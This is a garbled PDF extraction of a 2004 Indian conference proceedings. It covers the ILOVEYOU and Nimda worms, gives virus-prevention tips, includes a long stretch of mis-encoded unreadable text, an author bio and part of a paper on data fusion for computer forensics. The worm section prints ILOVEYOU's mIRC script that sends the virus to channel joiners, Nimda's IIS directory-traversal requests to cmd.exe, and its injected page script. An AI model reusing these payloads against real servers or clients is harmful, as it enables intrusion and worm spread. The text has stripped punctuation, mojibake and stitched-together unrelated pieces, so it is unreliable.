scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 23: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

